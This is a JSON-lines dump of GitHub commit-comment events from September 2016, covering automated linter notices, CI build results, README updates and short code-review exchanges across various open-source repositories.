{"id":"4508814988","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881125,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:27:00Z","updated_at":"2016-09-02T14:27:00Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-02T14:27:00Z"}
{"id":"4508815048","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881126,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:27:00Z","updated_at":"2016-09-02T14:27:00Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-02T14:27:00Z"}
{"id":"4508815102","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881127,"position":5,"line":null,"path":"src/Orm.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:27:01Z","updated_at":"2016-09-02T14:27:01Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-02T14:27:01Z"}
{"id":"4508815154","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881130,"position":11,"line":null,"path":"src/Orm.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:27:02Z","updated_at":"2016-09-02T14:27:02Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-02T14:27:02Z"}
{"id":"4508815205","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881131,"position":17,"line":null,"path":"src/Orm.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:27:02Z","updated_at":"2016-09-02T14:27:02Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-02T14:27:02Z"}
{"id":"4508815494","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881132,"position":20,"line":null,"path":"src/Orm.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:27:07Z","updated_at":"2016-09-02T14:27:07Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-02T14:27:07Z"}
{"id":"4508816527","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/economic_dispatch_sim"},"payload":{"comment":{"id":18881158,"position":null,"line":null,"path":null,"commit_id":"2247ebd5b87b3c7ce9fb779b80de1441e18e0c1c","created_at":"2016-09-02T14:27:17Z","updated_at":"2016-09-02T14:27:17Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:27:17Z"}
{"id":"4508817400","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881182,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:27Z","updated_at":"2016-09-02T14:27:27Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-02T14:27:27Z"}
{"id":"4508817461","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881184,"position":19,"line":null,"path":"src/Orm.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:27Z","updated_at":"2016-09-02T14:27:27Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-02T14:27:27Z"}
{"id":"4508818592","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/student_success_supervised_learning"},"payload":{"comment":{"id":18881212,"position":null,"line":null,"path":null,"commit_id":"a5a09a378c200c14ab39c6512efef339223e2e8f","created_at":"2016-09-02T14:27:39Z","updated_at":"2016-09-02T14:27:39Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:27:39Z"}
{"id":"4508819332","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881233,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:47Z","updated_at":"2016-09-02T14:27:47Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-02T14:27:47Z"}
{"id":"4508819364","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881235,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:47Z","updated_at":"2016-09-02T14:27:47Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-02T14:27:47Z"}
{"id":"4508819425","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881238,"position":5,"line":null,"path":"src/Orm.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:48Z","updated_at":"2016-09-02T14:27:48Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-02T14:27:48Z"}
{"id":"4508819487","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881241,"position":11,"line":null,"path":"src/Orm.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:48Z","updated_at":"2016-09-02T14:27:48Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-02T14:27:48Z"}
{"id":"4508819546","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881243,"position":17,"line":null,"path":"src/Orm.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:49Z","updated_at":"2016-09-02T14:27:49Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-02T14:27:49Z"}
{"id":"4508819833","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/customer_segments_unsupervised_learning"},"payload":{"comment":{"id":18881244,"position":null,"line":null,"path":null,"commit_id":"b0c6441bd6f2790b18b0c240bcbf48502591a71c","created_at":"2016-09-02T14:27:52Z","updated_at":"2016-09-02T14:27:52Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:27:52Z"}
{"id":"4508819920","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881245,"position":20,"line":null,"path":"src/Orm.php","commit_id":"b04909e2c5368c9bcfe3bc5b10364cbc40ec9d6e","created_at":"2016-09-02T14:27:54Z","updated_at":"2016-09-02T14:27:54Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-02T14:27:54Z"}
{"id":"4508821924","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/smartcab_reinforcement_learning"},"payload":{"comment":{"id":18881250,"position":null,"line":null,"path":null,"commit_id":"a9078a6d1ff742df2cb169c96998ea96f5588ceb","created_at":"2016-09-02T14:28:16Z","updated_at":"2016-09-02T14:28:16Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:28:16Z"}
{"id":"4508822244","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":18881252,"position":null,"line":null,"path":null,"commit_id":"04547da9dae6fdba66adcb795e351cbb3f4f6c34","created_at":"2016-09-02T14:28:19Z","updated_at":"2016-09-02T14:28:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.78](http://build.prxm.it:8813/viewLog.html?buildId=3650&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:28"}},"created_at":"2016-09-02T14:28:19Z"}
{"id":"4508822246","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":18881251,"position":null,"line":null,"path":null,"commit_id":"04547da9dae6fdba66adcb795e351cbb3f4f6c34","created_at":"2016-09-02T14:28:19Z","updated_at":"2016-09-02T14:28:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.78](http://build.prxm.it:8813/viewLog.html?buildId=3650&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:28"}},"created_at":"2016-09-02T14:28:19Z"}
{"id":"4508823813","type":"CommitCommentEvent","actor":{"login":"shatlykuber"},"repo":{"name":"shatlykuber/buck"},"payload":{"comment":{"id":18881254,"position":null,"line":null,"path":null,"commit_id":"89b999f1d6d1c314f3717d1f0c1b75bf77a8c162","created_at":"2016-09-02T14:28:35Z","updated_at":"2016-09-02T14:28:35Z","body":"`generateCxxLibraryTarget` is used for `apple_library` and `cxx_library` targets.\r\n\r\nSo, in case if `framework` flavor has been passed to these buck targets (in project command), the `productType` of the corresponding Xcode build target is set to `com.apple.product-type.framework`."}},"created_at":"2016-09-02T14:28:35Z"}
{"id":"4508824353","type":"CommitCommentEvent","actor":{"login":"MManahi"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18881257,"position":25,"line":25,"path":"DiscountTest.php","commit_id":"b41f6e0c738f5c863b1e715f00f7487bffa76279","created_at":"2016-09-02T14:28:41Z","updated_at":"2016-09-02T14:28:41Z","body":"1.We though that system would serve more than products (i.e booking items etc...)\r\n2. We'll change the var name."}},"created_at":"2016-09-02T14:28:41Z"}
{"id":"4508826103","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"trentm/python-markdown2"},"payload":{"comment":{"id":18881260,"position":18,"line":18,"path":"bin/markdown2","commit_id":"d14e1152e73521ac0908d9391385c55391b96646","created_at":"2016-09-02T14:28:59Z","updated_at":"2016-09-02T14:28:59Z","body":"Great minds think alike. Glad to know I'm not the only person that does this. 😄"}},"created_at":"2016-09-02T14:28:59Z"}
{"id":"4508826661","type":"CommitCommentEvent","actor":{"login":"Bernix01"},"repo":{"name":"Bernix01/mas-acceso"},"payload":{"comment":{"id":18881262,"position":3,"line":3,"path":"src/Usuario/Rol/colectorRol.php","commit_id":"acb9843350fef4c83348bccd8db8cb7faa43a971","created_at":"2016-09-02T14:29:06Z","updated_at":"2016-09-02T14:29:06Z","body":"es `use mas_acceso\\Usuario\\Rol\\RolClass;`"}},"created_at":"2016-09-02T14:29:06Z"}
{"id":"4508827708","type":"CommitCommentEvent","actor":{"login":"csev"},"repo":{"name":"sakaiproject/sakai"},"payload":{"comment":{"id":18881265,"position":null,"line":null,"path":null,"commit_id":"0155c1ffe178a82f18186777254c3ece5ec7e810","created_at":"2016-09-02T14:29:16Z","updated_at":"2016-09-02T14:29:16Z","body":"I will verify this."}},"created_at":"2016-09-02T14:29:16Z"}
{"id":"4508829652","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/udacity_ml_capstone"},"payload":{"comment":{"id":18881267,"position":null,"line":null,"path":null,"commit_id":"33d053f4065308def7c01860585bc0fec25cb9ac","created_at":"2016-09-02T14:29:36Z","updated_at":"2016-09-02T14:29:36Z","body":"docs: Opened repository with readme.md file as a placeholder to being capstone project."}},"created_at":"2016-09-02T14:29:36Z"}
{"id":"4508830119","type":"CommitCommentEvent","actor":{"login":"yerpj"},"repo":{"name":"espruino/Espruino"},"payload":{"comment":{"id":18881269,"position":null,"line":null,"path":null,"commit_id":"3525f0786c782970aa7aefbbbae5e9068ce73522","created_at":"2016-09-02T14:29:41Z","updated_at":"2016-09-02T14:29:41Z","body":"Minor update: checksum added on \"GO\" command. It was already done \"WRITE\" command, I just copy-pasted the few lines in order to remove probability of jumping at a corrupted address"}},"created_at":"2016-09-02T14:29:41Z"}
{"id":"4508832751","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/maze_runner_mdp"},"payload":{"comment":{"id":18881273,"position":null,"line":null,"path":null,"commit_id":"b266e192c14209b23cead06556ae36c988085697","created_at":"2016-09-02T14:30:11Z","updated_at":"2016-09-02T14:30:11Z","body":"docs: Updated the readme.md file, to include indication of file with examples."}},"created_at":"2016-09-02T14:30:11Z"}
{"id":"4508833947","type":"CommitCommentEvent","actor":{"login":"bamos"},"repo":{"name":"shkao/reading-list"},"payload":{"comment":{"id":18881277,"position":null,"line":null,"path":null,"commit_id":"bc1d70d336b4b18390a4a52adbc3ce0c82ea590d","created_at":"2016-09-02T14:30:24Z","updated_at":"2016-09-02T14:30:24Z","body":"🎉 "}},"created_at":"2016-09-02T14:30:24Z"}
{"id":"4508835733","type":"CommitCommentEvent","actor":{"login":"Bernix01"},"repo":{"name":"Bernix01/mas-acceso"},"payload":{"comment":{"id":18881281,"position":2,"line":2,"path":"src/Usuario/Rol/colectorRol.php","commit_id":"acb9843350fef4c83348bccd8db8cb7faa43a971","created_at":"2016-09-02T14:30:41Z","updated_at":"2016-09-02T14:30:41Z","body":"El namespace debe ser completo `namespace mas_acceso\\usuario\\rol;`"}},"created_at":"2016-09-02T14:30:41Z"}
{"id":"4508838549","type":"CommitCommentEvent","actor":{"login":"timpanogos"},"repo":{"name":"timpanogos/eveonline-third-party-documentation"},"payload":{"comment":{"id":18881288,"position":null,"line":null,"path":null,"commit_id":"dd8dd9376292769943ea41115fcbaa0a7a9e82c3","created_at":"2016-09-02T14:31:13Z","updated_at":"2016-09-02T14:31:13Z","body":"Note the ### Get being replaced with ###Data is the difference of documenting the \"Class Graph\" not the \"Object Graph\".  In other words documenting the Schema (http.option) verses documenting the actual data (http.get).\r\n\r\nCurrently we show json representation of a variable name and a snapshot/example value, where what is really needed is a variable name and it's type. \r\n\r\nI would add a new method to my SchemaMap class - generateDocumentation() which would generate the desired .md for each endpoint that is currently being reported via CallGroups.  All we need to do is agree on the format of the endpoint.md's ###Data section."}},"created_at":"2016-09-02T14:31:13Z"}
{"id":"4508839139","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18881290,"position":null,"line":null,"path":null,"commit_id":"2c3e0af93e00d7e2e20283be12541aaebabfa1bf","created_at":"2016-09-02T14:31:18Z","updated_at":"2016-09-02T14:31:18Z","body":"yes."}},"created_at":"2016-09-02T14:31:18Z"}
{"id":"4508842934","type":"CommitCommentEvent","actor":{"login":"Bernix01"},"repo":{"name":"Bernix01/mas-acceso"},"payload":{"comment":{"id":18881297,"position":4,"line":4,"path":"src/Usuario/Rol/colectorRol.php","commit_id":"acb9843350fef4c83348bccd8db8cb7faa43a971","created_at":"2016-09-02T14:32:01Z","updated_at":"2016-09-02T14:32:01Z","body":"es `use mas_acceso\\Util\\Collector;`\r\n"}},"created_at":"2016-09-02T14:32:01Z"}
{"id":"4508845468","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18881307,"position":null,"line":null,"path":null,"commit_id":"a8bcfad531bb8726ab9a503fab2f14e7aa222616","created_at":"2016-09-02T14:32:28Z","updated_at":"2016-09-02T14:32:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dSaJGgmTQECxZjczr-Xy_w"}},"created_at":"2016-09-02T14:32:28Z"}
{"id":"4508850273","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"abo-abo/lispy"},"payload":{"comment":{"id":18881316,"position":null,"line":null,"path":null,"commit_id":"b31249f6c113db164b2d43f47128602aa8f8671c","created_at":"2016-09-02T14:33:20Z","updated_at":"2016-09-02T14:33:20Z","body":"Please consider not tracking `zoutline.el` in two repositories. I would suggest that you create a separate repository just for `zoutline`. I do understand that maintaining an additional repository is more work than a single repository and think it makes sense you to stick to a single repository for `colir`, `cousel`, `ivy`, and `swiper`. But the situation is different here, isn't it more work to keep these two repositories in sync instead of adding a third repository.\r\n\r\nHaving the same library in two repositories is an issue for the Emacsmirror. I have invested a lot of time getting feature conflicts fixed and currently there are only two remaining this being one of them.\r\n\r\nThanks for considering!"}},"created_at":"2016-09-02T14:33:20Z"}
{"id":"4508853835","type":"CommitCommentEvent","actor":{"login":"Jakuje"},"repo":{"name":"OpenSC/OpenSC"},"payload":{"comment":{"id":18881327,"position":null,"line":null,"path":null,"commit_id":"e4f5f845129e3d0311e8e2994ae7e471b337f7f5","created_at":"2016-09-02T14:33:58Z","updated_at":"2016-09-02T14:33:58Z","body":"Oh. Seems like I will need to do some more reading about this (the guide looks like interesting reading). What you write makes perfect sense and needs to be fixed (here only in comments). Thanks for brief explanation."}},"created_at":"2016-09-02T14:33:58Z"}
{"id":"4508855094","type":"CommitCommentEvent","actor":{"login":"jaymedavis"},"repo":{"name":"jaymedavis/stripe.net"},"payload":{"comment":{"id":18881328,"position":null,"line":null,"path":null,"commit_id":"d44439ea2bfc3266c543368c397531cb657599af","created_at":"2016-09-02T14:34:12Z","updated_at":"2016-09-02T14:34:12Z","body":"Done, i still had it marked as pre-release."}},"created_at":"2016-09-02T14:34:12Z"}
{"id":"4508855515","type":"CommitCommentEvent","actor":{"login":"Gh14Cc10"},"repo":{"name":"ivanfemia/abap2xlsx"},"payload":{"comment":{"id":18881329,"position":null,"line":null,"path":null,"commit_id":"5251e4a4ae7cfc4a89685915c5149970638343cc","created_at":"2016-09-02T14:34:16Z","updated_at":"2016-09-02T14:34:16Z","body":"Hello @fidley  can you plase update the files Version history.docx, Version history.pdf with the new functionalities included in the daily build?"}},"created_at":"2016-09-02T14:34:16Z"}
{"id":"4508860383","type":"CommitCommentEvent","actor":{"login":"silvanheller"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18881338,"position":null,"line":null,"path":null,"commit_id":"4fc00766ceb1b425910dcc1d00966b273efcf804","created_at":"2016-09-02T14:35:11Z","updated_at":"2016-09-02T14:35:11Z","body":"#14 "}},"created_at":"2016-09-02T14:35:11Z"}
{"id":"4508875730","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18881370,"position":null,"line":null,"path":null,"commit_id":"007153c7099a9bdfe2ddc42202be72d18b766455","created_at":"2016-09-02T14:37:53Z","updated_at":"2016-09-02T14:37:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KGUKzvYHTUS8FB-vR_W4Cw"}},"created_at":"2016-09-02T14:37:53Z"}
{"id":"4508875768","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":18881371,"position":5,"line":30,"path":"test/e2e/pages/invite.js","commit_id":"246ffeb4214cd2a8d31fcd0d0b5302203ff7c20b","created_at":"2016-09-02T14:37:53Z","updated_at":"2016-09-02T14:37:53Z","body":"![image](https://cloud.githubusercontent.com/assets/26228/18207460/91f6b434-712b-11e6-9f90-cd12ac2dc2c8.png)\r\n"}},"created_at":"2016-09-02T14:37:53Z"}
{"id":"4508878653","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18881377,"position":46,"line":126,"path":"src/main/kotlin/org/rust/lang/core/parser/RustParserUtil.kt","commit_id":"c887fda2d73b5f0d08fac4c16b9060c46ad22c60","created_at":"2016-09-02T14:38:24Z","updated_at":"2016-09-02T14:38:24Z","body":"@mkaput looks like the distinction between statement-like macros and expression-like macros is not really helpful, because, for example, `try! { foo() }` is an expression and not an item."}},"created_at":"2016-09-02T14:38:24Z"}
{"id":"4508879747","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18881380,"position":null,"line":null,"path":null,"commit_id":"978727b4cfcc19de56f1e9df386ae447e3611277","created_at":"2016-09-02T14:38:36Z","updated_at":"2016-09-02T14:38:36Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-yokozuna/builds/1907\n"}},"created_at":"2016-09-02T14:38:36Z"}
{"id":"4508880300","type":"CommitCommentEvent","actor":{"login":"skbakker"},"repo":{"name":"skbakker/thema"},"payload":{"comment":{"id":18881384,"position":null,"line":null,"path":null,"commit_id":"8820347aac6d2b54a319300618b7fa37f176d065","created_at":"2016-09-02T14:38:42Z","updated_at":"2016-09-02T14:38:42Z","body":"Test comment"}},"created_at":"2016-09-02T14:38:42Z"}
{"id":"4508886118","type":"CommitCommentEvent","actor":{"login":"KHerron"},"repo":{"name":"opensourceautomation/Open-Source-Automation"},"payload":{"comment":{"id":18881395,"position":null,"line":null,"path":null,"commit_id":"ffacc0ddb62307c1d9d02a2ac34ec6f3db14b7aa","created_at":"2016-09-02T14:39:44Z","updated_at":"2016-09-02T14:39:44Z","body":"Thanks!"}},"created_at":"2016-09-02T14:39:44Z"}
{"id":"4508890381","type":"CommitCommentEvent","actor":{"login":"DevUt"},"repo":{"name":"steadfasterX/android_device_lge_h815"},"payload":{"comment":{"id":18881438,"position":null,"line":null,"path":null,"commit_id":"db5b846378e306163fbc6264705cff0b97b688b7","created_at":"2016-09-02T14:40:28Z","updated_at":"2016-09-02T14:40:28Z","body":"😀"}},"created_at":"2016-09-02T14:40:28Z"}
{"id":"4508890859","type":"CommitCommentEvent","actor":{"login":"fiatjaf"},"repo":{"name":"formspree/formspree"},"payload":{"comment":{"id":18881442,"position":29,"line":64,"path":"formspree/forms/helpers.py","commit_id":"d1d884ccee3b1e7969fc22e358de0f5f40f273ad","created_at":"2016-09-02T14:40:33Z","updated_at":"2016-09-02T14:40:33Z","body":"Good question."}},"created_at":"2016-09-02T14:40:33Z"}
{"id":"4508893439","type":"CommitCommentEvent","actor":{"login":"garychapman"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":18881447,"position":null,"line":null,"path":null,"commit_id":"8de32051f66fcc807b4ccf6fcde18195d2150f58","created_at":"2016-09-02T14:40:58Z","updated_at":"2016-09-02T14:40:58Z","body":"I've found a few bugs in this release. It's probably easier to describe how to reproduce:\r\n\r\n1. (after `meteor reset` and rebuilding) Create a new user, and then log in\r\n2. Click on #general in the CHANNELS list\r\n3. Click the (i)nformation icon on the top right to display the channel settings pane\r\n4. Open the Administration pane\r\n5. Select Rooms or Users - neither view displays, and the browser debug console will show various errors\r\n\r\nClicking on other items in the Admin menu (View Logs, Mailer, Integrations) also causes various exceptions to be thrown.\r\n\r\nI've included a screenshot where I've also circled some display glitches which occur intermittently.\r\n\r\nI'm running Windows 10.\r\n\r\n![screenshot](https://cloud.githubusercontent.com/assets/2315465/18207418/83ff308e-716e-11e6-98d0-d0610f1bde11.png) \r\n "}},"created_at":"2016-09-02T14:40:58Z"}
{"id":"4508896497","type":"CommitCommentEvent","actor":{"login":"GregSutcliffe"},"repo":{"name":"theforeman/foreman_templates"},"payload":{"comment":{"id":18881452,"position":5,"line":113,"path":"app/services/foreman_templates/template_importer.rb","commit_id":"36ec03310c36eb997a12dac2cafaa0ff90f49b4b","created_at":"2016-09-02T14:41:30Z","updated_at":"2016-09-02T14:41:30Z","body":"Whoops, thanks. I'll take it in whatever the next commit ends up being ;)"}},"created_at":"2016-09-02T14:41:30Z"}
{"id":"4508900017","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":18881460,"position":16,"line":284,"path":"mono/metadata/icall-def.h","commit_id":"f61f85579443e6f684f67bc7d2c548b5f5e202f2","created_at":"2016-09-02T14:42:06Z","updated_at":"2016-09-02T14:42:06Z","body":"The rule is pretty simple: Will current mscorlib (without recompilation) run with my change? If not you need to bump."}},"created_at":"2016-09-02T14:42:06Z"}
{"id":"4508903204","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18881467,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T14:42:42Z","updated_at":"2016-09-02T14:42:42Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T14:42:42Z"}
{"id":"4508907530","type":"CommitCommentEvent","actor":{"login":"Jakuje"},"repo":{"name":"OpenSC/OpenSC"},"payload":{"comment":{"id":18881476,"position":null,"line":null,"path":null,"commit_id":"e4f5f845129e3d0311e8e2994ae7e471b337f7f5","created_at":"2016-09-02T14:43:30Z","updated_at":"2016-09-02T14:43:30Z","body":"ATM the fix is in the https://github.com/OpenSC/OpenSC/pull/841/commits/5c8aeeb5fc890dfe1132eec4c09320495888b068 (part of #841) "}},"created_at":"2016-09-02T14:43:30Z"}
{"id":"4508908231","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"glenjamin/ultimate-hot-reloading-example"},"payload":{"comment":{"id":18881477,"position":19,"line":9,"path":"client/server-render.js","commit_id":"00de03e03551e6b7c435e1e73bbb786af0ee6517","created_at":"2016-09-02T14:43:38Z","updated_at":"2016-09-02T14:43:38Z","body":"Is there any reason for loading an external HTML document?\r\n\r\nYou are already using JSX transpiler. Might as well generate the HTML document.\r\n\r\n```js\r\nconst rendered = renderToString(\r\n  <html>\r\n    <body>\r\n      <Provider store={store}>\r\n        <App />\r\n      </Provider>\r\n    </body>\r\n  </html>\r\n);\r\n```"}},"created_at":"2016-09-02T14:43:38Z"}
{"id":"4508917226","type":"CommitCommentEvent","actor":{"login":"glenjamin"},"repo":{"name":"glenjamin/ultimate-hot-reloading-example"},"payload":{"comment":{"id":18881498,"position":19,"line":9,"path":"client/server-render.js","commit_id":"00de03e03551e6b7c435e1e73bbb786af0ee6517","created_at":"2016-09-02T14:45:18Z","updated_at":"2016-09-02T14:45:18Z","body":"Nothing that springs to mind, just habit really."}},"created_at":"2016-09-02T14:45:18Z"}
{"id":"4508921556","type":"CommitCommentEvent","actor":{"login":"lucascosta"},"repo":{"name":"glenjamin/ultimate-hot-reloading-example"},"payload":{"comment":{"id":18881503,"position":19,"line":9,"path":"client/server-render.js","commit_id":"00de03e03551e6b7c435e1e73bbb786af0ee6517","created_at":"2016-09-02T14:46:02Z","updated_at":"2016-09-02T14:46:02Z","body":"In this commit I was only concerned with the ES2015 update. Maybe you could open an issue on this."}},"created_at":"2016-09-02T14:46:02Z"}
{"id":"4508924442","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18881510,"position":46,"line":126,"path":"src/main/kotlin/org/rust/lang/core/parser/RustParserUtil.kt","commit_id":"c887fda2d73b5f0d08fac4c16b9060c46ad22c60","created_at":"2016-09-02T14:46:32Z","updated_at":"2016-09-02T14:46:32Z","body":"from what I remember this is only used for determining whether to put space between macro name and parenthesis/brace/bracket"}},"created_at":"2016-09-02T14:46:32Z"}
{"id":"4508928513","type":"CommitCommentEvent","actor":{"login":"adowsky"},"repo":{"name":"THerman95/JOGL-Test"},"payload":{"comment":{"id":18881517,"position":90,"line":0,"path":"JOGL-Test/src/com/therman/engine/Inputs/Input.java","commit_id":"777348afc0005362d9c4c2792a92b4e82af36a48","created_at":"2016-09-02T14:47:14Z","updated_at":"2016-09-02T14:47:14Z","body":"Puste implementacje wygladaja slabo. Potrzebne ci są te interfejsy? Jak nie to wywal i dodaj jak b3dziesz pisal implementacje metod."}},"created_at":"2016-09-02T14:47:14Z"}
{"id":"4508929963","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18881520,"position":23,"line":102,"path":"src/main/kotlin/org/rust/lang/core/parser/RustParserUtil.kt","commit_id":"c887fda2d73b5f0d08fac4c16b9060c46ad22c60","created_at":"2016-09-02T14:47:29Z","updated_at":"2016-09-02T14:47:29Z","body":"bad formatting"}},"created_at":"2016-09-02T14:47:29Z"}
{"id":"4508930924","type":"CommitCommentEvent","actor":{"login":"yama"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18881523,"position":null,"line":null,"path":null,"commit_id":"7bf955c8d2628a30f8dbc58625450ff4ca8702c1","created_at":"2016-09-02T14:47:40Z","updated_at":"2016-09-02T14:47:40Z","body":"https://github.com/modxcms/evolution/commit/f17de0417565f0324adb3f67687cf4a6b839059b\r\nThanks for your information. Fixed, ok?"}},"created_at":"2016-09-02T14:47:40Z"}
